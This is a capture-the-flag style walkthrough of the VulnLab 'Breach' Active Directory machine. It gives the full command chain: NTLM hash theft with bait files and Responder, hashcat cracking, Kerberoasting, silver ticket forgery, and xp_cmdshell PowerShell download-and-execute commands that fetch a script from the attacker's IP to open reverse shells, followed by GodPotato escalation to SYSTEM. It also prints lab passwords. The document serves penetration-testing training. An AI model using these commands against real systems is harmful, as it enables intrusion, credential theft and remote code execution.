VL-Breach

Vulnlab Breach: Complete Active Directory Compromise Through NTLM Relay and Silver Ticket Attacks

In this comprehensive VulnLab walkthrough, I’ll demonstrate how to penetrate the “Breach” domain environment by exploiting a series of vulnerabilities leading to complete domain compromise. Starting with anonymous SMB access and NTLM hash capture through social engineering, we’ll progress through Kerberoasting attacks against service accounts, silver ticket generation for privilege escalation, and ultimately achieve SYSTEM-level access via MSSQL exploitation and token impersonation. This penetration test showcases several real-world Active Directory attack vectors including guest account enumeration, NTLM theft techniques, Kerberos service account exploitation, silver ticket forgery, and leveraging impersonation privileges for escalation. The techniques demonstrated highlight common security misconfigurations in Windows environments that penetration testers should look for during enterprise assessments.

Initial Enumeration

NMAP Scan Results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-17 15:22:18Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.109.252:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
| smb2-time: 
|   date: 2025-03-17T15:22:26
|_  start_date: N/A
|_clock-skew: mean: -1h59m59s, deviation: 0s, median: -1h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

User Access

Enumerating Shares

First, let’s check for available SMB shares using the guest account:

1
netexec smb 10.10.109.252 -u 'guest' -p '' --shares

Available SMB Shares
Next, let’s connect to the “share” using the guest account:

1
smbclient //10.10.109.252/share -U 'guest'

Potential Users
We found several potential users:

1
2
3
claire.pope
diana.pope
julia.wong

NTLM Hash Capture

We used ntlm_theft (https://github.com/Greenwolf/ntlm_theft) to create files that, when accessed, would send us the NTLM hash of the user who opened them:

1
python3 ntlm_theft.py -g all -s <your ip> -f invoice

After creating these files, we connected to the SMB share and uploaded them to all accessible folders:

1
smbclient //10.10.126.89/share -U 'guest'
1
mput *

Then we started Responder to capture any callbacks:

1
sudo responder -I tun0 -dwv

Julia Wong Hash Capture
We saved the hash and cracked it using hashcat:

1
hashcat hash55.txt /usr/share/wordlists/rockyou.txt

Accessing Julia Wong’s Files

Now that we have Julia Wong’s credentials, we logged back into the share:

1
smbclient //10.10.126.89/share -U 'julia.wong'

Local User Flag
This is where we found the user flag.

Privilege Escalation

BloodHound Enumeration

To get a better understanding of the Active Directory environment, we used BloodHound:

1
netexec ldap 10.10.126.89 -u 'julia.wong' -p 'Computer1'  --bloodhound --dns-server 10.10.126.89 -c All --dns-tcp

Inside BloodHound, we identified a kerberoastable service named SVC_MSSQL@BREACH.VL. We decided to target this service for our lateral movement.

Kerberoasting

We attempted to obtain the service hash:

1
impacket-GetUserSPNs -dc-ip 10.10.126.89 -request breach.vl/julia.wong:'<PASSWORD>'

Initially, we encountered a clock skew error: KRB_AP_ERR_SKEW(Clock skew too great). To fix this, we synchronized our time with the target system:

1
sudo timedatectl set-ntp off
1
sudo rdate -n [IP of Target]

Then we ran GetUserSPNs again:
SQL Service Hash
We cracked the hash using hashcat:

1
hashcat hash56.txt /usr/share/wordlists/rockyou.txt

This gave us the password for the MSSQL service account.

MSSQL Access

We connected to the MSSQL server using the service account:

1
impacket-mssqlclient svc_mssql:Trustno1@10.10.126.89

We attempted to enable command execution but encountered permission issues:

1
2
3
4
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

Silver Ticket Attack

Since we couldn’t execute commands directly, we decided to create a Silver Ticket:

  1. First, we converted the service account password to an NT hash using an online tool: https://www.browserling.com/tools/ntlm-hash

  2. Next, we needed the domain SID:

    1
    lookupsid.py 'breach.vl/svc_mssql@10.10.126.89' 0
    1
    Domain SID is: S-1-5-21-2330692793-3312915120-706255856

  3. We created the Silver Ticket using ticketer:

    1
    impacket-ticketer -nthash <> -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
    1
    export KRB5CCNAME=administrator.ccache

  4. We used the Silver Ticket to connect to MSSQL as administrator:

    1
    impacket-mssqlclient -k breachdc.breach.vl
    1
    enable_xp_cmdshell

Getting a Reverse Shell

Our initial attempt to get a reverse shell was flagged as malicious:

1
EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/Invoke-ConPtyShell.ps1''); Invoke-ConPtyShell 10.8.5.195 3001"';

We found an alternative payload that worked:

1
EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/maybe.ps1'')"';

Initial Shell

Privilege Escalation to SYSTEM

Impersonation Privileges
Since we had impersonation privileges, we used GodPotato to escalate to SYSTEM: https://github.com/BeichenDream/GodPotato/releases/tag/V1.20

1
./God.exe -cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command  IEX (New-Object Net.WebClient).DownloadString('http://10.8.5.195:8080/maybe.ps1')"

We modified our maybe.ps1 script and set up a listener:

1
nc -lvnp 4444

Admin Shell

https://api.vulnlab.com/api/v1/share?id=c3140301-21e1-4913-99b2-b635726c0e21